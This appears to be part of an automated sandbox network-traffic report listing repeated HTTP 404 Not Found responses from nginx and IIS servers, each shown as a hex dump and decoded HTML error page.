Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 11 Nov 2024 17:13:44 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:13:45 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 11 Nov 2024 17:13:48 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Mon, 11 Nov 2024 17:13:42 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:13:48 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 11 Nov 2024 17:14:52 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 11 Nov 2024 17:14:53 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 11 Nov 2024 17:14:53 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 11 Nov 2024 17:14:53 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 